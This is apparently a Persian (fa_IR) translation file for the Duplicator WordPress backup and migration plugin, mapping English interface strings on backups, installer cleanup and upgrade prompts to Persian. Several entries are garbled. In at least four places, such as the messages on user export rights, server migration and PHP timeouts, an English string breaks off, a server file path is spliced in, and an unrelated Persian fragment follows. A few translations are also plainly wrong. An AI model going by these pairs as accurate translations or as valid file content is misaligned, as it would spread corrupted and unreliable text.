file.'=>'استفاده از یک فایل «امن» به جلوگیری از دسترسی غیرمجاز به فایل نصب‌کننده کمک می‌کند.','Secure'=>'امن','File Name'=>'نام فایل','%1$s and %2$s represents the opening and closing HTML tags for an anchor or linkConsider upgrading to %1$sDuplicator Pro%2$s for unlimited large site support with DupArchive.'=>'برای پشتیبانی نامحدود از سایت‌های بزرگ با DupArchive، ارتقا به %1$sDuplicator Pro%2$s را در نظر بگیرید.','Duplicator Lite has a fixed constraint of 500MB for daf formats.'=>'Duplicator Lite برای فرمت‌های daf محدودیت ثابت ۵۰۰ مگابایت دارد.','Duplicator Lite has no fixed size constraints for zip formats. The only constraints are timeouts on the server.'=>'داپلیکیتور لایت هیچ محدودیت اندازه ثابتی برای فرمت های فشرده ندارد. تنها محدودیت ها وقفه های زمانی روی سرور است.','Multi-Threaded (Pro)'=>'چند رشته‌ای (حرفه‌ای)','Note: This message will be removed after all installer files are removed. Installer files must be removed to maintain a secure site. Click the link above to remove all installer files and complete the migration.'=>'توجه: این پیام پس از حذف تمام فایل‌های نصب‌کننده حذف خواهد شد. برای حفظ امنیت سایت، فایل‌های نصب‌کننده باید حذف شوند. برای حذف تمام فایل‌های نصب‌کننده و تکمیل انتقال، روی پیوند بالا کلیک کنید.','Final step:'=>'مرحله نهایی:','Security actions:'=>'اقدامات امنیتی:','The following installation files are stored in the folder %s'=>'فایل های نصب زیر در پوشه %s ذخیره می شوند','This site has been successfully restored!'=>'این سایت با موفقیت بازیابی شد!','The Duplicator team has worked many years to make moving a WordPress site a much easier process. '=>'تیم Duplicator سال‌ها تلاش کرده است تا انتقال یک سایت وردپرس را به فرآیندی بسیار آسان‌تر تبدیل کند. ',' If the installer files do not successfully get removed with this action, then they WILL need to be removed manually through your hosts control panel or FTP. Please remove all installer files to avoid any security issues on this site.'=>' اگر با این کار فایل های نصب با موفقیت حذف نمی شوند ، لازم است که آنها به صورت دستی از طریق کنترل پنل هاست یا FTP حذف شوند. لطفاً تمام فایل های نصب را حذف کنید تا از بروز هرگونه مشکل امنیتی در این سایت جلوگیری کنید.','Installation cleanup ran!'=>'پاکسازی نصب اجرا شد!','If an archive.zip/daf file was intentially added to the root directory to perform an overwrite install of this site then you can ignore this message.'=>'اگر یک فایل archive.zip/daf عمداً به دایرکتوری ریشه اضافه شده باشد تا نصب مجدد این سایت انجام شود، می‌توانید این پیام را نادیده بگیرید.','Restore Backup Almost Complete!'=>'بازیابی نسخه پشتیبان تقریباً کامل شد!','- Consider upgrading to %s for unlimited large site support.'=>'- برای پشتیبانی نامحدود از سایت‌های بزرگ، ارتقا به %s را در نظر بگیرید.','Click to configure installer name.'=>'برای پیکربندی نام نصب کننده کلیک کنید.','Locations'=>'مکان‌ها','The installer is also available inside the Backup file.'=>'فایل نصب نیز در داخل فایل پشتیبان موجود است.','Click buttons or links to download.'=>'برای دانلود روی دکمه‌ها یا لینک‌ها کلیک کنید.','Download basic installer (installer.php)'=>'دانلود فایل نصب اولیه (installer.php)','Download hashed installer ([name]_[hash]_[time]_installer.php)'=>'دانلود نصب کننده هش شده ([name]_[hash]_[time]_installer.php)','Error on caches purge of %s.'=>'خطا در پاکسازی حافظه پنهان %s.','All caches on %s have been purged.'=>'همه حافظه های پنهان در %s پاک شده اند.','Original files folder'=>'پوشه فایل‌های اصلی','Installer boot log'=>'گزارش بوت نصب کننده','Installer log'=>'گزارش نصب','Can\'t move %s to %s'=>'نمی‌توان %s را به %s منتقل کرد','Original files folder moved in installer backup directory'=>'پوشه فایل‌های اصلی به پوشه پشتیبان نصب‌کننده منتقل شد','ARCHIVE CONSISTENCY TEST: PASS'=>'آزمون سازگاری بایگانی: قبول','ARCHIVE CONSISTENCY TEST: FAIL'=>'آزمون سازگاری بایگانی: ناموفق','Zip archive %1s not present.'=>'بایگانی زیپ %1s موجود نیست.','INVALID REQUEST: File not found, please check the backup folder for file.'=>'درخواست نامعتبر: فایل یافت نشد، لطفاً پوشه پشتیبان را برای فایل بررسی کنید.','Drag and drop or use a URL for super-fast installs (requires Pro*)'=>'برای نصب‌های فوق‌العاده سریع، کشیدن و رها کردن یا استفاده از URL (نیاز به نسخه حرفه‌ای*)','Import Backup and Overwrite Site'=>'وارد کردن نسخه پشتیبان و بازنویسی سایت','Overwrite Site'=>'بازنویسی سایت','Install to Empty Directory '=>'نصب در دایرکتوری خالی ','Visit the \'Quick Start\' guide!'=>'به راهنمای «شروع سریع» مراجعه کنید!','Click \'Create New\' to Backup Site'=>'برای پشتیبان‌گیری از سایت، روی «ایجاد سایت جدید» کلیک کنید','Templates are not available in Duplicator Lite!'=>'قالب‌ها در Duplicator Lite در دسترس نیستند!','See Backup Log For Complete Details'=>'برای جزئیات کامل به گزارش پشتیبان‌گیری مراجعه کنید','Error status unavailable.'=>'وضعیت خطا در دسترس نیست.','System Details'=>'جزئیات سیستم','unavailable'=>'غیرقابل دسترس','If the error details are not specific consider the options below by clicking each section.'=>'اگر جزئیات خطا مشخص نیست، با کلیک روی هر بخش، گزینه‌های زیر را در نظر بگیرید.','This server cannot complete the build due to host setup constraints, see the error message for more details.'=>'این سرور به دلیل محدودیت‌های تنظیمات میزبان نمی‌تواند ساخت را تکمیل کند، برای جزئیات بیشتر به پیام خطا مراجعه کنید.','Quickly overwrite an existing WordPress site in a few clicks.'=>'به سرعت و با چند کلیک، یک سایت وردپرس موجود را بازنویسی کنید.','Install to an empty directory like a new WordPress install does.'=>'مانند یک وردپرس جدید، آن را در یک پوشه خالی نصب کنید.','Notice:Duplicator Lite does not officially support WordPress multisite.'=>'توجه: Duplicator Lite رسماً از وردپرس چند سایته پشتیبانی نمی‌کند.','[Show Installer Name]'=>'[نمایش نام نصب کننده]','Clicking this button will open the installer and Backup download prompts one after the other with one click verses downloading each file separately with two clicks. On some browsers you may have to disable pop-up warnings on this domain for this to work correctly.'=>'با کلیک بر روی این دکمه، نصب کننده و درخواست های دانلود پشتیبان پشتیبان یکی پس از دیگری با آیه های یک کلیک باز می شود و هر فایل به طور جداگانه با دو کلیک دانلود می شود. در برخی از مرورگرها ممکن است مجبور شوید اخطارهای بازشو در این دامنه را غیرفعال کنید تا به درستی کار کند.','Download Both Files:'=>'دانلود هر دو فایل:','Download Both Files'=>'دانلود هر دو فایل','Download Backup Files'=>'دانلود فایل‌های پشتیبان','Build Time'=>'زمان ساخت','Backup Build Completed'=>'ساخت نسخه پشتیبان تکمیل شد','Step 3: Build and download the Backup files.'=>'مرحله ۳: فایل‌های پشتیبان را بسازید و دانلود کنید.','When clicking the Installer download button, the \'Save as\' dialog will save the name as \'[name]_[hash]_[time]_installer.php\'. This is the secure and recommended option. For more information goto: Settings ❯ Backups Tab ❯ Installer Name Option. To quickly copy the hashed installer name, to your clipboard use the copy icon link.'=>'هنگامی که روی دکمه دانلود نصب کننده کلیک می کنید، گفتگوی \'ذخیره به عنوان\' نام را به عنوان \'[name]_[hash]_[time]_installer.php\' ذخیره می کند. این گزینه ایمن و توصیه شده است. برای اطلاعات بیشتر، به این آدرس بروید: تنظیمات ❯ برگه پشتیبان گیری ❯ گزینه نام نصب کننده. برای کپی سریع نام نصب کننده هش شده، در کلیپ بورد خود از پیوند نماد کپی استفاده کنید.','When clicking the Installer download button, the \'Save as\' dialog will default the name to \'installer.php\'. To improve the security and get more information, goto: Settings ❯ Backups Tab ❯ Installer Name option.'=>'وقتی روی دکمه دانلود نصب کننده کلیک می کنید، گفتگوی «ذخیره به عنوان» نام پیش فرض را به \'installer.php\' می دهد. برای بهبود امنیت و دریافت اطلاعات بیشتر، به این موارد بروید: تنظیمات ❯ برگه پشتیبان گیری ❯ گزینه نام نصب کننده.','Only the database and a copy of the installer will be included in the Backup file. This notice simply indicates that the Backup will not be capable of restoring a full WordPress site, but only the database. If this is the desired intention then this notice can be ignored.'=>'فقط پایگاه داده و یک کپی از نصب کننده در فایل پشتیبان گنجانده می شود. این اخطار به سادگی نشان می‌دهد که پشتیبان‌گیری قادر به بازیابی یک سایت کامل وردپرس نیست، بلکه فقط پایگاه داده را خواهد داشت. اگر این هدف مورد نظر باشد، می توان از این اطلاعیه چشم پوشی کرد.','While it is not recommended you can still continue with the build of this Backup. At install time additional manual custom configurations will need to be made to finalize this multisite migration. Please note that any support requests for mulitsite with Duplicator Lite will not be supported.'=>'اگرچه توصیه نمی‌شود، اما همچنان می‌توانید به ساخت این نسخه پشتیبان ادامه دهید. در زمان نصب، برای نهایی کردن این مهاجرت چندسایتی، باید پیکربندی‌های سفارشی دستی اضافی انجام شود. لطفاً توجه داشته باشید که هرگونه درخواست پشتیبانی برای چندسایتی با Duplicator Lite پشتیبانی نخواهد شد.','Check Site Health'=>'بررسی سلامت سایت','Scan Time:'=>'زمان اسکن:','Step 2: Scan site for configuration & system notices.'=>'مرحله ۲: سایت را برای پیکربندی و اعلان‌های سیستم اسکن کنید.','The installer file is used to redeploy/install the Backup contents.'=>'فایل نصب‌کننده برای نصب/استقرار مجدد محتوای پشتیبان‌گیری استفاده می‌شود.','Configuration'=>'پیکربندی','This is the storage location on this server where the Backup and installer files will be saved.'=>'این محل ذخیره‌سازی روی این سرور است که فایل‌های پشتیبان و نصب‌کننده در آن ذخیره می‌شوند.','Step 1: Choose the WordPress contents to backup.'=>'مرحله ۱: محتوای وردپرس را برای پشتیبان‌گیری انتخاب کنید.','We strongly recommend upgrading to '=>'ما اکیداً توصیه می‌کنیم که به [نسخه] بالاتر ارتقا دهید ','Duplicator Lite does not officially support WordPress multisite.'=>'افزونه Duplicator Lite رسماً از وردپرس چند سایته پشتیبانی نمی‌کند.','SQL Mode'=>'حالت SQL','Back up this site to %1$s, %2$s, %3$s, %4$s, %5$s and other locations with '=>'از این سایت در %1$s، %2$s، %3$s، %4$s، %5$s و سایر مکان‌ها نسخه پشتیبان تهیه کنید ','Build Log'=>'گزارش ساخت','Share File Links'=>'اشتراک‌گذاری لینک فایل‌ها','Trace Logging Enabled. Please disable when trace capture is complete.'=>'ردیابی ورود فعال شد. لطفا بعد از اتمام ردیابی، آن را غیرفعال کنید.','Can\'t rename installer file %s with HASH, please remove it for security reasons'=>'تغییر نام فایل نصب %s با هش امکان پذیر نیست ، لطفاً به دلایل امنیتی آن را حذف کنید','Installer file %s renamed with HASH'=>'فایل نصب کننده (Installer) %s با HASH تغییر نام داده شد','Can\'t remove installer file %s, please remove it for security reasons'=>'فایل نصب %s حذف نشد ، لطفاً به دلایل امنیتی آن را حذف کنید','Installer file %s removed for security reasons'=>'فایل نصبی %s به دلایل امنیتی حذف شد','To use "Duplicator LITE" please deactivate "Duplicator PRO" from the '=>'برای استفاده از "Duplicator LITE" لطفا "Duplicator PRO" را از قسمت ','The "Duplicator Lite" and "Duplicator Pro" plugins cannot both be active at the same time. '=>'افزونه‌های «Duplicator Lite» و «Duplicator Pro» نمی‌توانند همزمان فعال باشند. ','Duplicator Notice:'=>'اطلاعیه تکثیرکننده:','plugins page'=>'صفحه افزونه‌ها','Quick Start Guide'=>'راهنمای شروع سریع','Migrate Duplicator Settings'=>'تنظیمات کپی‌رایت را منتقل کنید','Installer Branding'=>'برندسازی نصاب','File & Database Table Filters'=>'فیلترهای جدول فایل و پایگاه داده','Foreign CSS'=>'سی‌اس‌اس خارجی','Disable'=>'غیرفعال کردن','Foreign JavaScript'=>'جاوا اسکریپت خارجی','Duplicator Lite allows users to build a Backup on managed hosts, however, the installer may not properly install Backups created on managed hosts due to the non-standard configurations of managed hosts. It is also possible the Backup engine of Duplicator Lite won’t be able to capture all of the necessary data of a site running on a managed host.'=>'Duplicator Lite به کاربران اجازه می‌دهد تا روی هاست‌های مدیریت‌شده پشتیبان‌گیری کنند، با این حال، ممکن است نصب‌کننده به دلیل پیکربندی‌های غیراستاندارد هاست‌های مدیریت‌شده، پشتیبان‌گیری‌های ایجاد شده روی هاست‌های مدیریت‌شده را به درستی نصب نکند. همچنین ممکن است موتور پشتیبان‌گیری Duplicator Lite نتواند تمام داده‌های لازم سایتی را که روی یک هاست مدیریت‌شده اجرا می‌شود، ضبط کند.','A managed host is a WordPress host that tightly controls the server environment so that the software running on it can be closely ‘managed’ by the hosting company. Managed hosts typically have constraints imposed to facilitate this management, including the locking down of certain files and directories as well as non-standard configurations.'=>'یک هاست مدیریت‌شده، یک هاست وردپرس است که محیط سرور را به شدت کنترل می‌کند تا نرم‌افزاری که روی آن اجرا می‌شود، بتواند توسط شرکت هاستینگ به دقت «مدیریت» شود. هاست‌های مدیریت‌شده معمولاً محدودیت‌هایی برای تسهیل این مدیریت دارند، از جمله قفل کردن فایل‌ها و دایرکتوری‌های خاص و همچنین پیکربندی‌های غیراستاندارد.','Managed Host'=>'میزبان مدیریت‌شده','System'=>'سیستم','Object Access'=>'دسترسی به اشیاء','This database makes use of %1$s which can manually be imported at install time. Instructions and SQL statement queries will be provided at install time for users to execute. No actions need to be performed at this time, this message is simply a notice.'=>'این پایگاه داده از %1$s استفاده می کند که می تواند به صورت دستی در زمان نصب وارد شود. دستورالعمل ها و پرس و جوهای بیانیه SQL در زمان نصب برای کاربران ارائه می شود تا آنها را اجرا کنند. در حال حاضر نیازی به انجام هیچ کاری نیست، این پیام صرفاً یک اعلان است.','triggers'=>'محرک‌ها','Triggers'=>'محرک‌ها','Duplicator
Your logged-in user role does not have export /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php: قابلیت خروجی گرفتن ندارد، بنابراین به قابلیت نسخه بردار دسترسی ندارید.','example: utf8_general_ci (value is optional)'=>'مثال: utf8_general_ci (مقدار اختیاری است)','Collation'=>'جمع‌بندی','example: utf8 (value is optional)'=>'مثال: utf8 (مقدار اختیاری است)','Managed Hosting Support'=>'پشتیبانی میزبانی مدیریت شده','Recovery Points'=>'نقاط بازیابی','Streamlined Installer'=>'نصب‌کننده‌ی ساده','Drag & Drop Installs'=>'نصب با کشیدن و رها کردن','AJAX Call Error!'=>'خطای فراخوانی AJAX!','Import'=>'واردات','Recovery'=>'بهبودی','Drag and Drop Import is not available in Duplicator Lite!'=>'قابلیت وارد کردن با کشیدن و رها کردن (Drag and Drop) در Duplicator Lite در دسترس نیست!','Shell mysql dump error. Change SQL Mode to the "PHP Code" in the Duplicator > Settings > Backups.'=>'خطای dump در Shell mysql. حالت SQL را در Duplicator > Settings > Backups به "PHP Code" تغییر دهید.','Notice with that ID doesn\'t exist.'=>'توجه داشته باشید که شناسه‌ای با آن وجود ندارد.','Invalid Request'=>'درخواست نامعتبر','Security issue'=>'مسئله امنیتی','Invalid Request.'=>'درخواست نامعتبر.','Installer Name:'=>'نام نصب کننده:','Installer Name'=>'نام نصب کننده','When clicking the Installer download button, the \'Save as\' dialog is defaulting the name to \'[name]_[hash]_[time]_installer.php\'. This is the secure and recommended option. For more information, go to: Settings > Backups Tab > Installer > Name or click on the gear icon at the top of this page.

To quickly copy the hashed installer name, to your clipboard use the copy icon link or click the installer name and manually copy the selected text.'=>'هنگام کلیک بر روی دکمه دانلود نصب‌کننده، کادر محاوره‌ای «ذخیره به عنوان» نام پیش‌فرض را روی «[name]_[hash]_[time]_installer.php» قرار می‌دهد. این گزینه امن و توصیه‌شده است. برای اطلاعات بیشتر، به تنظیمات > برگه پشتیبان‌گیری > نصب‌کننده > نام بروید یا روی نماد چرخ‌دنده در بالای این صفحه کلیک کنید.

برای کپی سریع نام هش‌شده نصب‌کننده، از پیوند نماد کپی در کلیپ‌بورد خود استفاده کنید یا روی نام نصب‌کننده کلیک کنید و متن انتخاب‌شده را به صورت دستی کپی کنید.','When clicking the Installer download button, the \'Save as\' dialog is currently defaulting the name to \'installer.php\'. To improve the security and get more information, go to: Settings > Backups Tab > Installer > Name option or click on the gear icon at the top of this page.'=>'وقتی روی دکمه دانلود نصب‌کننده کلیک می‌کنید، گفتگوی \'ذخیره به‌عنوان\' در حال حاضر نام \'installer.php\' را پیش‌فرض می‌کند. برای بهبود امنیت و دریافت اطلاعات بیشتر، به مسیر تنظیمات > برگه پشتیبان گیری > نصب کننده > نام بروید یا روی نماد چرخ دنده در بالای این صفحه کلیک کنید.','(Contents Path)'=>'(مسیر محتوا)','(Legacy Path)'=>'(مسیر میراث)','[Storage Options]'=>'[گزینه های ذخیره سازی]','[Copy Installer Name to Clipboard]'=>'[کپی کردن نام نصب کننده به کلیپبورد]','The %s is set to create Backups in the \'DupArchive\' format. This custom format is used to overcome budget host constraints. With DupArchive, Duplicator is restricted to processing sites up to %s. To process larger sites, consider these recommendations. '=>'%s طوری تنظیم شده است که پشتیبان‌ها را در قالب \'DupArchive\' ایجاد کند. این قالب سفارشی برای غلبه بر محدودیت‌های بودجه میزبان استفاده می‌شود. با DupArchive، Duplicator به پردازش سایت‌هایی تا %s محدود می‌شود. برای پردازش سایت‌های بزرگتر، این توصیه‌ها را در نظر بگیرید. ','Click for recommendations.'=>'برای دریافت توصیه‌ها کلیک کنید.','The database user for this WordPress site does NOT sufficient permissions to write stored procedures or functions to the sql file of the archive. Stored procedures will not be added to the sql file.'=>'کاربر پایگاه داده این سایت وردپرس مجوزهای کافی برای نوشتن رویه ها یا توابع ذخیره شده در فایل sql بایگانی را ندارد. رویه های ذخیره شده به فایل sql اضافه نمی شوند.','The database user for this WordPress site has sufficient permissions to write stored procedures and functions to the sql file of the archive. [The command SHOW CREATE FUNCTION will work.]'=>'کاربر پایگاه داده این سایت وردپرس دارای مجوزهای کافی برای نوشتن رویه ها و توابع ذخیره شده در فایل sql آرشیو است. [فرمان SHOW CREATE FUNCTION کار خواهد کرد.]','The function mysqli_real_escape_string is not working properly. Please consult host support and ask them to switch to a different PHP version or configuration.'=>'تابع mysqli_real_escape_string به درستی کار نمی‌کند. لطفاً با پشتیبانی میزبان مشورت کنید و از آنها بخواهید که به نسخه یا پیکربندی PHP دیگری تغییر دهند.','read this section'=>'این بخش را بخوانید','To understand the importance and usage of the installer name, please'=>'برای درک اهمیت و کاربرد نام نصاب، لطفاً','Default \'Save as\' name:'=>'نام پیش‌فرض «ذخیره به عنوان»:','Advanced Storage'=>'ذخیره‌سازی پیشرفته','Save Storage Settings'=>'ذخیره تنظیمات ذخیره‌سازی','Only disable this option if issues occur when downloading either the installer/archive files.'=>'فقط در صورتی که هنگام دانلود فایل‌های نصب‌کننده/بایگانی مشکلی پیش آمد، این گزینه را غیرفعال کنید.','When checked this setting will prevent Duplicator from laying down an .htaccess file in the storage location above.'=>'وقتی این تنظیم علامت زده شود، Duplicator از قرار دادن فایل .htaccess در محل ذخیره‌سازی بالا جلوگیری می‌کند.','Apache .htaccess'=>'فایل .htaccess آپاچی','More Advanced Storage Options...'=>'گزینه‌های ذخیره‌سازی پیشرفته‌تر...','Storage Settings Saved'=>'تنظیمات ذخیره‌سازی ذخیره شد','Copy to Clipboard!'=>'کپی در کلیپ بورد!','unable to copy'=>'قادر به کپی کردن نیست','Copied: '=>'کپی شده: ','Invalid request.'=>'درخواست نامعتبر.','Plugin(s) listed here have been deactivated during installation to help prevent issues. Please activate them to finish this migration: '=>'افزونه(های) ذکر شده در اینجا برای جلوگیری از مشکلات، هنگام نصب غیرفعال شده‌اند. لطفاً برای تکمیل این انتقال، آنها را فعال کنید: ','Warning!'=>'هشدار!','The Backup created here cannot be migrated to a new server. /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php: افزونه را در سایت هایی که نیاز به پشتیبان گیری دارند نصب کنید.','No large files found during this scan. If you\'re having issues building a Backup click the back button and try adding a file filter to non-essential files paths like wp-content/uploads. These excluded files can then be manually moved to the new location after you have ran the migration installer.'=>'هیچ فایل بزرگی در طول این اسکن یافت نشد. اگر در ساختن پشتیبان‌گیری مشکل دارید، روی دکمه برگشت کلیک کنید و سعی کنید یک فیلتر فایل را به مسیرهای فایل‌های غیر ضروری مانند wp-content/uploads اضافه کنید. پس از اجرای نصب کننده مهاجرت، این فایل های حذف شده را می توان به صورت دستی به مکان جدید منتقل کرد.','Files over %1$s are listed below. Larger files such as movies or zipped content can cause timeout issues on some budget hosts. If you are having issues creating a Backup try excluding the directory paths below or go back to Step 1 and add them.'=>'فایل‌های بزرگتر از %1$s در زیر فهرست شده‌اند. فایل‌های بزرگتر مانند فیلم‌ها یا محتوای زیپ شده می‌توانند در برخی از میزبان‌های ارزان‌قیمت باعث مشکلات تایم اوت شوند. اگر در ایجاد نسخه پشتیبان مشکل دارید، سعی کنید مسیرهای دایرکتوری زیر را حذف کنید یا به مرحله 1 برگردید و آنها را اضافه کنید.','%s size in bytesThis notice is triggered at [%s] and can be ignored on most hosts. If during the build process you see a "Host Build Interrupt" message then this host has strict processing limits. Below are some options you can take to overcome constraints set up on this host.'=>'این اخطار در [%s] فعال می‌شود و در اکثر میزبان‌ها نادیده گرفته می‌شود. اگر در طول فرآیند ساخت، پیام «وقفه در ساخت میزبان» را مشاهده کردید، این میزبان محدودیت‌های پردازش سختی دارد. در زیر چند گزینه وجود دارد که می توانید برای غلبه بر محدودیت های تنظیم شده در این میزبان استفاده کنید.',' Disable the advanced option to re-enable file controls.'=>' برای فعال کردن مجدد کنترل‌های فایل، گزینه پیشرفته را غیرفعال کنید.','All file checks are skipped. This could cause problems during extraction if problematic files are included.'=>'تمام بررسی‌های فایل نادیده گرفته می‌شوند. اگر فایل‌های مشکل‌دار وجود داشته باشند، این امر می‌تواند هنگام استخراج مشکل ایجاد کند.','This size includes only files BEFORE compression is applied. It does not include the size of the database script or any applied filters. Once complete the Backup size will be smaller than this number.'=>'این اندازه فقط شامل فایل‌های قبل از فشرده‌سازی می‌شود. اندازه اسکریپت پایگاه داده یا فیلترهای اعمال شده را شامل نمی شود. پس از تکمیل، اندازه پشتیبان گیری از این عدد کوچکتر خواهد شد.','A Backup is being processed. Retry later.'=>'نسخه پشتیبان در حال پردازش است. بعداً دوباره امتحان کنید.','Alert!'=>'هشدار!','No selections made! Please select at least one Backup to delete.'=>'هیچ انتخابی انجام نشد! لطفاً حداقل یک نسخه پشتیبان برای حذف انتخاب کنید.','No selections made! Please select an action from the "Bulk Actions" drop down menu.'=>'هیچ انتخابی انجام نشد! لطفاً از منوی کشویی «اقدامات دسته جمعی» یک اقدام را انتخاب کنید.','Items'=>'اقلام','Current Server Time'=>'زمان سرور فعلی','To stop or reset this Backup build goto Settings > Advanced > Reset Backups'=>'برای توقف یا بازنشانی این ساخت پشتیبان، به تنظیمات > پیشرفته > بازنشانی پشتیبان‌ها بروید','Backup Build Running'=>'ساخت نسخه پشتیبان در حال اجرا','For any issues in this section please contact your hosting provider or server administrator. For additional information see our online documentation.'=>'برای هر گونه مشکل در این بخش، لطفاً با ارائه دهنده میزبان یا سرپرست سرور خود تماس بگیرید. برای اطلاعات بیشتر به مستندات آنلاین ما مراجعه کنید.','Safe Mode should be set to Off in you php.ini file and is deprecated as of PHP 5.3.0.'=>'حالت ایمن (Safe Mode) باید در فایل php.ini شما روی خاموش (Off) تنظیم شده باشد و از PHP 5.3.0 به بعد منسوخ شده است.','PHP versions 5.2.9+ or higher is required.'=>'نسخه‌های PHP 5.2.9+ یا بالاتر مورد نیاز است.','Set up one-time storage locations and automatically push the Backup to your destination.'=>'مکان‌های ذخیره‌سازی یکبار مصرف را تنظیم کنید و به‌طور خودکار نسخه پشتیبان را به مقصد خود منتقل کنید.','Show/Hide Password'=>'نمایش/پنهان کردن رمز عبور','Duplicator Pro allows you to create a Backup and store it at a custom location on this server or to a remote cloud location such as Google Drive, Amazon, Dropbox and many more.'=>'Duplicator Pro به شما امکان می‌دهد از یک نسخه پشتیبان تهیه کنید و آن را در یک مکان دلخواه روی این سرور یا در یک مکان ابری از راه دور مانند Google Drive، Amazon، Dropbox و موارد دیگر ذخیره کنید.','Overwrite Live Site'=>'بازنویسی سایت زنده','LinkedIn'=>'لینکدین','Twitter'=>'توییتر','Facebook'=>'فیسبوک','Duplicator can streamline your workflow and quickly clone/migrate a WordPress site. The plugin helps admins, designers and /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php: 5 ستاره باشید و محصول حرفه ای ما را خریداری کنید.',' Valid only when Backup Engine for ZipArchive is enabled.'=>' فقط زمانی معتبر است که موتور پشتیبان‌گیری برای ZipArchive فعال باشد.','This option is recommended for large sites or sites on constrained servers.'=>'این گزینه برای سایت‌های بزرگ یا سایت‌هایی که روی سرورهای محدود قرار دارند توصیه می‌شود.','Creates a custom Backup format (archive.daf).'=>'یک فرمت پشتیبان‌گیری سفارشی (archive.daf) ایجاد می‌کند.','This option uses the internal PHP ZipArchive classes to create a zip file.'=>'این گزینه از کلاس‌های داخلی PHP ZipArchive برای ایجاد یک فایل زیپ استفاده می‌کند.','Creates a Backup format (archive.zip).'=>'یک فرمت پشتیبان (archive.zip) ایجاد می‌کند.','DupArchive'=>'بایگانی Dup','Archive Engine'=>'موتور بایگانی','

Multi-Threaded mode is only available in Duplicator Pro.'=>'

حالت Multi-Threaded فقط در داپلیکیتور پرو موجود است.','Single-Threaded mode attempts to create the entire database script in one request. Multi-Threaded mode allows the database script to be chunked over multiple requests. Multi-Threaded mode is typically slower but much more reliable especially for larger databases.'=>'حالت Single-Threaded تلاش می کند تا کل اسکریپت پایگاه داده را در یک درخواست ایجاد کند. حالت Multi-Threaded اجازه می دهد تا اسکریپت پایگاه داده بر روی چندین درخواست تکه تکه شود. حالت Multi-Threaded معمولاً کندتر است اما بسیار قابل اعتمادتر است به خصوص برای پایگاه های داده بزرگتر.','PHP Code Mode:'=>'حالت کد پی اچ پی:','Single-Threaded'=>'تک رشته‌ای','Add a custom path if the path to mysqldump is not properly detected. For all paths use a forward slash as the path seperator. On Linux systems use mysqldump for Windows systems use mysqldump.exe. If the path tried does not work please contact your hosting provider for details on the correct path.'=>'اگر مسیر mysqldump به درستی شناسایی نشد، یک مسیر سفارشی اضافه کنید. برای همه مسیرها از یک اسلش رو به جلو به عنوان جداکننده مسیر استفاده کنید. در سیستم های لینوکس از mysqldump برای سیستم های ویندوز استفاده کنید از mysqldump.exe استفاده کنید. اگر مسیر امتحان شده کار نمی کند، لطفاً برای جزئیات بیشتر در مورد مسیر صحیح با ارائه دهنده میزبانی خود تماس بگیرید.','Backups successfully reset'=>'پشتیبان‌ها با موفقیت بازنشانی شدند','RESPONSE ERROR!'=>'خطای پاسخ!','Ajax request error'=>'خطای درخواست آژاکس','AJAX ERROR! '=>'خطای آژاکس! ','No'=>'خیر','Yes'=>'بله','Resetting settings, Please Wait...'=>'تنظیمات در حال بازنشانی هستند، لطفا صبر کنید...','This will clear and reset all of the current temporary Backups. Would you like to continue?'=>'با این کار تمام نسخه‌های پشتیبان موقت فعلی پاک و بازنشانی می‌شود. آیا می خواهید ادامه دهید؟','Check this option if other plugins/themes CSS files are conflicting with Duplicator.'=>'اگر فایل‌های CSS سایر افزونه‌ها/قالب‌ها با Duplicator تداخل دارند، این گزینه را علامت بزنید.','Do not modify this setting unless you know the expected result or have talked to support.'=>'این تنظیم را تغییر ندهید، مگر اینکه از نتیجه مورد انتظار مطلع باشید یا با پشتیبانی صحبت کرده باشید.','Check this option if other plugins/themes JavaScript files are conflicting with Duplicator.'=>'اگر فایل‌های جاوا اسکریپت سایر افزونه‌ها/قالب‌ها با Duplicator تداخل دارند، این گزینه را علامت بزنید.','If enabled all files check on scan will be skipped before Backup creation. In some cases, this option can be beneficial if the scan process is having issues running or returning errors.'=>'اگر فعال باشد، بررسی اسکن همه فایل‌ها قبل از ایجاد پشتیبان حذف می‌شود. در برخی موارد، این گزینه می تواند مفید باشد اگر فرآیند اسکن دارای مشکلاتی در اجرا یا بازگشت خطا باشد.','Skip'=>'پرش','This action should only be used if the Backups screen is having issues or a build is stuck.'=>'این اقدام فقط باید در صورتی استفاده شود که صفحه پشتیبان‌گیری با مشکل مواجه شده باشد یا ساخت‌وساز متوقف شده باشد.','Reset Settings'=>'تنظیمات را بازنشانی کنید','This process will reset all Backups by deleting those without a completed status, reset the active Backup id and perform a cleanup of the build tmp file.'=>'این فرآیند با حذف نسخه‌های پشتیبان بدون وضعیت تکمیل‌شده، تمام نسخه‌های پشتیبان را بازنشانی می‌کند، شناسه نسخه پشتیبان فعال را بازنشانی می‌کند و فایل tmp ساخت را پاکسازی می‌کند.','Advanced'=>'پیشرفته','Download Trace Log'=>'دانلود گزارش ردیابی','WARNING: Only turn on this setting when asked to by support as tracing will impact performance.'=>'هشدار: این تنظیم را فقط در صورت درخواست پشتیبانی فعال کنید زیرا ردیابی بر عملکرد تأثیر می‌گذارد.','Turns on detailed operation logging. Logging will occur in both PHP error and local trace logs.'=>'ثبت جزئیات عملیات را فعال می‌کند. ثبت وقایع هم در خطاهای PHP و هم در گزارش‌های ردیابی محلی انجام می‌شود.','Trace Log'=>'گزارش ردیابی',' If this process continues please see the previous FAQ link.'=>' اگر این روند ادامه داشت، لطفاً به لینک سوالات متداول قبلی مراجعه کنید.','please retry the installer cleanup process'=>'لطفاً فرآیند پاکسازی نصب‌کننده را دوباره امتحان کنید','Some of the installer files did not get removed, '=>'بعضی از فایل‌های نصب‌کننده حذف نشدند، ','No Duplicator files were found on this WordPress Site.'=>'هیچ فایل تکثیرکننده‌ای در این سایت وردپرس یافت نشد.','Removed'=>'حذف شد','File Found: Unable to remove'=>'فایل پیدا شد: حذف نشد','Architecture'=>'معماری','If the value shows dynamic then this means its possible for PHP to run longer than the default. /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php:حذف شوند. این فایل ها به دلایل امنیتی نباید روی سیستم های تولیدی باقی بمانند. در زیر فایل هایی هستند که باید حذف شوند.','(directory)'=>'(دایرکتوری)','No Log'=>'بدون لاگ','Unknown'=>'ناشناخته','64-bit'=>'۶۴ بیتی','32-bit'=>'۳۲ بیتی','Activate %s'=>'%s را فعال کنید','Reserved Duplicator installation files have been detected in the root directory. Please delete these installation files to avoid security 